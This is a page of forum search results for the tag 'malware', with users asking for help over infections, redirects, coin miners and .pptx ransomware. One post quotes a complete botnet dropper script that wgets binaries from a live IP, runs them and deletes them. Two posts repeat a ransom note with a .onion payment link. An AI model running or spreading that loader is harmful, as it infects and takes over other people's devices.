Showing results for tags 'malware'.



Found 381 results

  1. Hey there, I am Vicenç, a Spanish student in KTH Stockholm trying to finish my MSc degree. Recently, my laptop (Acer TravelMate P) has slowed down a lot. When investigating it, the performance of my CPU is questionable. When I launch internet browsers, the CPU usage spikes. In addition, my task administrator reveals processes I have no idea how they got there. After googling most of them, they are normal processes, it is just they take much RAM and CPU usage. More than one would normally expect. I noticed as well the creation of random folders with the name of '!EndpointProtectionFolderDo NotDiscard' in Files, Images, Videos and Music, when I never installed Sandblast software. The images are like this: I ran several antimalware programs in safe mode, but none of them detected any infection. The usage of memory is really strange and it is making me worried. I hope some of you can help, I would profoundly appreciate. As someone who relies heavily on his PC, 2 weeks without a laptop would be terrible. I remain at your disposal. Best, Vicenç
  2. I was using Yahoo mail in Mozilla Firefox when a warning popped up saying, "Your Windows 10 is infected with 3 viruses" The link in the address bar changed to: https://www.mscheck002.club/sk/fa9ff2ca/us/?clid=c45693d5bc364beb8cffa6e9f15eff8d9ca7&p1=74070&p2=&pre_tpl=6 Is this malware? The last time it happened I ran Malwarebytes and found nothing. Thanks
  3. Hello, I'm puzzled by the fact that I keep getting random notices that Malwarebytes has blocked an attempt to connect to members.chello.nl, which is supposedly a site infected by ransomware. I'm glad that Malwarebytes is blocking these attempts. My question is, Why is my computer making these attempts? I have never used that site. I am not trying to open that site. There seems to be some automatic process that is initiating these attempts. I assume it is some kind of malware. How do I find it and get rid of it? I've run a full Malwarebytes Premium scan, which showed zero threats. I've also run an AdwCleaner scan, with no threats detected. Thanks for any advice! Lance
  4. Hi Team, Hope this finds you well. I am struggling with a virus: "PUP.Optional.Legacy". Initially, this virus was showing up in my malware scan. I ran through a few procedures, and now it doesn't. However, it is still showing up in my adware scan. I keep going through "clean & repair," but it does not remove the PUP. I've attached my scan logs for your review. Can you please assist with the next steps? Kindest, Maurice AdwCleaner[S02].txt Malware scan report.txt FRST.txt Addition.txt
  5. I am also having the same issue. I have run all the tools to no avail. I have attached the requested files. Obviously, I don't want to just ignore the messages, I want to actually delete the adware or whatever it is. Help please. Thanks. FRST.txt Addition.txt
  6. Hello everyone, I just read this article and got a little worried: https://www.howtogeek.com/fyi/bing-is-pushing-malware-when-you-search-for-chrome/ I have three quick questions that I hope someone could help me with: 1. If you actually run that phony installer, will it still act as the official installer? As in everything will act normally but you actually have a hidden malware in your Chrome? 2. If I installed Chrome a while ago, how can I check that my installation is genuine and not a fake Google Chrome? I don't have the installer anymore. 3. Would a Malwarebytes scan detect a bad installation? I ran a scan and it didn't find anything. Thank you and have an awesome day!
  7. Posted Yesterday, 01:59 PM I'm a completely novice computer user. Recently, I have been having some malware issues on my PC which is Windows 10. I already have an antivirus, Quick Heal Total Security, and recently, it detected a Coinhive mining malware on my computer, plus, it keeps showing pop up windows that it has blocked access to multiple harmful websites even when I'm accessing reliable websites like Amazon and others. I researched a bit on the Coinhive virus and found out some serious things, and so I'm currently scanning my computer for all kinds of malware, spyware, adware, rootkits using a variety of tools just to be safe. I know I'm being paranoid, but better be paranoid than have my personal data compromised. So far, I've used Malwarebytes to run a full system scan, TDSSKiller for rootkits, and a full system scan by my installed antivirus. All three of them came up clean after that one Coinhive virus was removed. I'm also planning to use more scanners like AdW, ESET, Rkill, as many as I have found to be on the safe side. Now, I started running a scan with GMER for rootkits today, in safe mode, however, the first time, mid-scan, the window just disappeared off the screen. I ran it a second time, and it only showed two entries in the log list before a message was displayed that my system had run into an error and needed to restart. I booted the computer into safe mode once again and started GMER for the third time, and same thing happened. Two logs, then mid-scan, same error message and restart. So, now I'm thinking I do have a rootkit that is stopping GMER from running a scan. I really don't know what to do right now. I also know that GMER is supposed to be for advanced users only, but my plan was to just get the results, save them and then show them to an expert, either here or if not possible, then to someone I know. However, given the fact that the scan won't even get halfway through, I don't know what to do. 
Would be grateful if someone could point me in the right direction. GMER not being able to complete the scan does mean that I have some kind of rootkit stopping it from working, right? Or could there be any other reasons for that? Thank you very much. P.S. I know I need to backup my data before I run any tools recommended by experts here, but I'm actually worried about infecting my backup as well. As I have already mentioned before, my computer was infected by a coinhive mining virus before, and even though it's removed now, I haven't deleted any old system restore points or registry files so it's possible the virus still persists. Plus, since my computer may have other kinds of malware right now including rootkits, if I try to back up my data now, isn't there a good possibility that I'm also infecting my back up? I back up all my data on an external hard drive, and they are even more susceptible to infection, just by plugging it in to my computer right now could transmit the malware. So, if in the end of the malware removal process, I lose some of my data and have to restore it from my backup, am I facing a chance of re-infection and also damage to my external hard drive? If so, then could you please suggest a safe way to backup all of my data? My data does not contain any applications or program files, it's only composed of documents, videos, music and images which are all stored in D and E drives, I'm not going to be backing up anything from C drive. Is there no way to safely backup, or backup in a way so that when I restore it back on the clean PC, it does not reinfect? Because I currently have some important files on my computer that I can't lose, I know there is no 100% guaranteed way that if I backup it won't be infected, but how should I reduce the risks? 
I don't want to lose any files by running scans with the anti-malware tools, so please point me in the right direction of backing up my files relatively safely before I can use the suggested tools and post the logs. Please suggest a safe backup method so I can proceed with the removal process.
  8. I'm currently using Malwarebytes for PC and Android phone. A few days ago, while scanning my Android phone, Malwarebytes just detected a malware; the malware name is Android/PUP.Riskware.Autoins.Fota. I just wanna ask if this malware is dangerous and what the virus can do to me and my phone. I searched the virus name in Google but the result is nothing. Hoping to get an answer.
  9. Hi, So the other day I decided to start using AVG again instead of Bitdefender, downloaded AVG and it took around 3 hours to "install", eventually I canceled this and immediately got "recycle bin is corrupted" message. I then tried to run Malwarebytes but got told I didn't have permission to use my D drive (PC has SSD C drive with Windows and D drive HDD for data). My account is definitely the admin. After some digging, I managed to boot in safe mode, get Malwarebytes running on my C drive and deleted the contents of the recycle bin and all downloaded files within the last 2 weeks. However, I still don't have access to delete or edit files on my D drive so can only assume it's still lurking in my files. Could anyone help? I will post my FRST file when I get back home.
  10. For the past few days, the Firefox browser on my PC has been opening up to the Microsoft or Google homepage, despite it being set to Firefox home. Changing the homepage to something else doesn't seem to work, although new tabs aren't affected. This prompted me to look in my NoScript extension, where I briefly noticed something along the lines of "cdn.immereeako". I looked it up and found a very detailed article about some "iTranslator" malware. It mentions the same browser redirect that I've experienced, as well as a folder in my (C:\ProgramData) that was created on the 22nd of this month. Unfortunately, McAfee, Spybot Search & Destroy and Malwarebytes have been unable to get rid of the issue, so I'm pretty stumped on getting rid of this thing. Addition.txt FRST.txt Malwarebytes threat scan.txt
  11. I have the same problem--smartlink.cool--but I do not want to "silence" the warning, I want to find and remove the offending source. I have performed all the steps in the post by miekiemoes but the problem remains. I also ran AdwCleaner to no avail. What can I do?
  12. The night of the 17th, I was using the Facebook app while suddenly a download in progress icon appeared in the status bar. I pulled down the notifications screen just in time to catch a glimpse of the word "attackers" followed by a bunch of symbols like $ before it disappeared. I could not find anything in the downloads folder list, ESET premium that was monitoring my phone and all downloads hadn't even detected it, and I tried in vain to search online using only the selected phrases I had managed to glimpse. Then by sheer luck, today, I managed to find a thread on this problem with the full details. The message had been "attackers on <b>%1$s</b> might atte..." with a download in progress while using Facebook app. Which I assume is completed as "might attempt to steal your information" or something. I tried using this phrase to search about it on Google, and while nothing specific to this problem came up, a list of generic information results on various types of network attacks, DDos, man in the middle and zero day attacks came up, which has me really worried. I am still using the phone as is, I really don't know much about technology related things. Please advise me what I should do now, if I should just turn off the phone or something. The person in the other thread said he had reset his phone and the problem had reappeared when he had signed into Facebook again, so now I'm not sure if a simple factory reset will help and I will probably need to install a custom ROM or something. I'm using Android 7.0 in a Samsung Galaxy J7 Prime. I got a software update to Oreo just an hour earlier and I wonder if updating the software will help remove whatever malware/spyware/hacking application got installed. Please help, I am logged into all my accounts through this phone and it's already been like 4 days since the message first appeared damage control is needed. Thank you very much. If you know anything, anything, please let me know it's very urgent.
  13. I have ADS X malware installed, and am unable to delete it. Each time I search for anything I get several extra responses at the top of the result lists, and a small almost imperceptible "ADS X" text at the right where I can close those irrelevant results, but still the listing has several bad responses. Malwarebytes was unable to remove that ADS X; Malwarebytes is not aware of its existence. REIMAGE CLEANER detects the malware but I don't want to pay them for the removal. Why is Malwarebytes not detecting it but others do? ....
  14. I have noticed that all of the tech-support scammers use GoToAssist to control people's PCs. Does any legitimate company use this software? Is there any prospect on getting this classified as a potentially unwanted program or something?
  15. Hello people of the Malwarebytes forums. I'm a new Linux user and I've run into this bins.sh from a site. I don't really know what it does. So if someone could shed some light on it, it would be greatly appreciated.

      #!/bin/bash
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mips; chmod +x sirius.mips; ./sirius.mips; rm -rf sirius.mips
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mpsl; chmod +x sirius.mpsl; ./sirius.mpsl; rm -rf sirius.mpsl
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.sh4; chmod +x sirius.sh4; ./sirius.sh4; rm -rf sirius.sh4
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x86; chmod +x sirius.x86; ./sirius.x86; rm -rf sirius.x86
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm6; chmod +x sirius.arm6; ./sirius.arm6; rm -rf sirius.arm6
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x32; chmod +x sirius.x32; ./sirius.x32; rm -rf sirius.x32
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.i586; chmod +x sirius.i586; ./sirius.i586; rm -rf sirius.i586
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.m68k; chmod +x sirius.m68k; ./sirius.m68k; rm -rf sirius.m68k
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm4; chmod +x sirius.arm4; ./sirius.arm4; rm -rf sirius.arm4
      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm5; chmod +x sirius.arm5; ./sirius.arm5; rm -rf sirius.arm5

      Also don't know if this is in the right section or not so please move it if it's not.
  16. Recently been attacked, all my files have now changed to .pptx type. No matter what type of file is on my system (audio, video, exe), all are changed to PowerPoint file type. I have tried almost every tool for decryption but no use; also, identification methods online can't identify it as well. I need help cuz all my data is very important to me and I can't access it. Any news for the same attack or any progress in decrypting it will be a help. Hope this gets over soon. Here is the message present in every folder in a text document: Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique ID so n so ( a very long id)
  17. Hi, I have the same problem with my desktop computer. All my files were changed to .PPTX. I need someone willing to help please. All the encrypted files are too important. I can't just delete them. Here's the same note they left. Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique
  18. Please help me. I have this problem too, all my files changed to .pptx. Here to find the alternatives. Thanks.
  19. Hi everyone, I installed a file on my Win 10 machine today. After installing, it is not opening, and when trying to delete it from Control Panel I get an error: runtime error could not call proc (at 399:4752). Can someone please help?
  20. I keep getting popups from MalwareBytes saying it's blocked smartlink.cool - which is nice - but it would be good to be able to say: "Just block this, log it, but don't bother telling me every time."
  21. I am running Windows 10 Home on a HP machine. I suspect that my machine has become infected in the recent past and I want to clean up the malware, either by a number of removal tools or by formatting. Before doing that, I need to back up my important data, but I don't want to back up any infected files as I will be restoring them after the malware removal process is done. Now, I only have this one machine, the possibly infected one, and an external HDD that I back up my data to. But I don't want my external HDD to get infected too when I plug it in via USB cable. Is there a relatively safer way to back up my recent data to my HDD from my infected computer? At this point, I'm considering using either a Live CD/USB to boot the computer and then copy my documents, photos, videos etc to my external HDD, or back up to a cloud storage. Which of these two options will be better and safer? I have around 250 gb of data on my hard drive, so please suggest a safe backup method accordingly. ALSO, I have read on online forums that I should refrain from backing up certain file formats like .exe, .ini, .xml etc. While I know what the executable and autorun file formats are and won't be backing them up, I do not understand what script files like .php and .xml are and which kinds of files are supposed to have them. Do normal word documents (.docx), picture, video and audio file formats have any script files attached to them that I may need to worry about? Any help and suggestions will be truly appreciated as I need it urgently. Thanks in advance.
  22. Greetings all, I have tried deleting the quarantined files, I have also run AdwCleaner on the most updated version and rebooted multiple times and it still appears in my new scans. I have checked my processes to look for anything out of the ordinary, I looked inside all of my HKEY folders to see if I could find anything in there or in System32, I also checked to see if there were any outside IPs connected in my hosts and there were not. Please help me in deleting this from my PC.
  23. Hi guys, I'll keep my story short. I think my PC is being remotely controlled and infected with Trojans, malware, ransomware, etc. What makes me feel like that? Well, my certificates, credentials, passwords, user rights and much more being changed/blocked/deleted. I had to exchange my Comcast router. I had a technician coming to my house to do a checkup; he found my outside Xfinity box open and the cables were played with. He installed a MoCA point of entry adapter just in case I'm a victim of a man of the middle or evil twin attack. I installed ExpressVPN, brand new Bitdefender 2019 top security software, changed my security settings within my router to basically max security. Blocked MAC addresses... I recovered my own laptop for the 10th time but somehow someone or something keeps getting access to my laptop. I have extremely high data consumption at night while I sleep even though my PC is shut down before I go to sleep. Current status: I disabled my wifi adapter within BIOS and am plugged into ethernet. My antivirus and VPN are broken because they don't work anymore, I can't deinstall certain software anymore, like Malwarebytes for example. I have weird background tasks running. There are unknown root kit certificates installed by root agency and lots and lots of other stuff happening... I am attaching some pictures for you that looked suspicious to me. I am writing this from my galaxy so which also has a VPN on it because my phone started to act strange. Please, I need an expert like you folks to look into this and tell me what's going on. Much appreciated.
  24. So I've been having this problem for the last few days, my PC was pretty slow so I ran malwarebytes and it found a lot of stuff, then got rid of it but they came back with every reboot so I started looking into solutions online, I guess I've managed to get rid of a few of them by running a lot of different cleaning tools but "conhost.exe" always comes back after reboot. There was also some exes called lsmose and mysa1 mysa2 and mysa3 which I found out online that are bitcoin miners. I can stop the conhost manually by stopping some processes but it comes back after every reboot so I would really appreciate some help. I already ran FRST and attached the files, also not sure if this changes anything but these are the cleaning tools I used: malwarebytes, hitmanpro, roguekiller, mbamantirootkit and combofix FRST.txt Addition.txt
  25. Hello you guys, I'm a student. When I study malware, I wonder how we can detect a file that was infected? I googled and then learned that AV and some sandboxes detect malware through hash256. However, I cannot understand how it works. Please help me know, how can we hash a file then compare with a hash database? Thanks for reading!